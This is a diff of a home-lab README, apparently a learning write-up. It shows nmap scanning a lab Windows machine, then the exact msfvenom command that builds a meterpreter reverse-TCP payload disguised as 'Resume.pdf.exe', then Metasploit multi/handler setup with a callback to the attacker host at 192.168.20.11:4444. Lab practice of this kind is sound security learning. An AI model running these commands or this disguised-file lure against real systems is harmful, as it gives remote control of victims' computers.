jplugaru/Home-Lab/README.md

 <img width="2560" alt="3 1" src="https://github.com/user-attachments/assets/7187ec61-80d8-46eb-9932-d1f504b16ba2" />

 Next, I took note of the IP address of my Kali Linux machine that will be used in building the malware.
-The IP address can be obtained by typing ifconfig in the Terminal.
+The IP address is obtained by typing ifconfig in the Terminal.

 <img width="2560" alt="3 2" src="https://github.com/user-attachments/assets/93217f8f-4614-4328-8981-ff8641c57938" />

 Next, in the Terminal, I type nmap -A 192.168.20.10 -Pn.
 My Windows machine is on the IP address ending in .10.
-Nmap will scan all the ports and will scan them. -Pn skips pings.
+Nmap scans all the ports and will scan them. -Pn skips pings.
 After Nmap runs, the results return showing that port 3389 for RDP is open on the Windows machine.

 <img width="2560" alt="3 3" src="https://github.com/user-attachments/assets/bfebb106-9f86-4644-9846-7b72e4f4c066" />

-In Terminal, I then typed msfvenom -l payloads to view the list of midterpreters that can be used as the payload.
-The one I selected is windows/x64/meterpreter_reverse_tcp
+In Terminal, I type msfvenom -l payloads to view the list of midterpreters that can be used as the payload.
+The one I selected is windows/x64/meterpreter_reverse_tcp.

 <img width="2560" alt="3 4" src="https://github.com/user-attachments/assets/ddf263fa-85cb-4dd8-84b8-b9e731191f88" />

-Next, in Terminal, I typed msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.20.11 lport=4444 -f exe -o Resume.pdf.exe.
-This command will generate malware using meterpreter’s reverse TCP payload which is instructed to connect back to a machine based on the L host and L port.
-The file format will be an .exe format as specified and the file name will be Resume.pdf.exe.
+Next, in Terminal, I type msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.20.11 lport=4444 -f exe -o Resume.pdf.exe.
+This command generates malware using meterpreter’s reverse TCP payload which is instructed to connect back to a machine based on the L host and L port.
+The file format is an .exe format as specified and the file name will be Resume.pdf.exe.

 <img width="2560" alt="3 5" src="https://github.com/user-attachments/assets/6f223fdd-72e6-472e-94cf-243cd94815a9" />

-After running the command, I typed ls in Terminal to verify that the file has been created.
+After running the command, I type ls in Terminal to verify that the file has been created by printing out the contents of the current directory.

 <img width="2560" alt="3 6" src="https://github.com/user-attachments/assets/6db034ed-3a62-4d46-b722-108df800d888" />

-Metasploit is then opened by typing msfconsole in Terminal.
-The multihandler is used by then typing use exploit/multi/handler.
-This then allows the user to be in the exploit itself.
+Metasploit is opened by typing msfconsole in Terminal.
+The multihandler is used by typing use exploit/multi/handler.
+This allows the user to be in the exploit itself.

 <img width="2560" alt="3 7" src="https://github.com/user-attachments/assets/bc9597fb-2158-406a-bf29-6246c5813286" />

-In Terminal, I typed options to see what can be configured.
+In Terminal, I type options to see what can be configured.
 The payload option is currently generic/shell_reverse_tcp.
-This will be changed so that it is the same payload as used when the malware is configured and msfvenom.
+This is changed so that it is the same payload as used when the malware is configured and msfvenom.
 To change the payload, I type set payload windows/x64/meterpreter/reverse_tcp.

 <img width="2560" alt="3 8" src="https://github.com/user-attachments/assets/9f5c6dc5-ed52-4183-a733-a97d6f68e10e" />

-I typed options in Terminal again to verify that the payload option was changed to Windows x64 meterpreter reverse TCP.
+I type options in Terminal again to verify that the payload option was changed to Windows x64 meterpreter reverse TCP.

 <img width="2560" alt="3 9" src="https://github.com/user-attachments/assets/675e6ad2-a77c-4321-927b-da3f1579baa1" />

-Afterwards, the LHOST should be changed to the attacker machine which is the IP address of the Kali Linux machine.
+Afterwards, the LHOST should is changed to the attacker machine which is the IP address of the Kali Linux machine.
 I type set lhost 192.168.20.11 in Terminal.
-Afterwards, I type options to verify that the change took place
+Afterwards, I type options to verify that the change took place.

 <img width="2560" alt="3 10" src="https://github.com/user-attachments/assets/bf37c294-d86b-4a9c-b6a5-ab77f3072ce0" />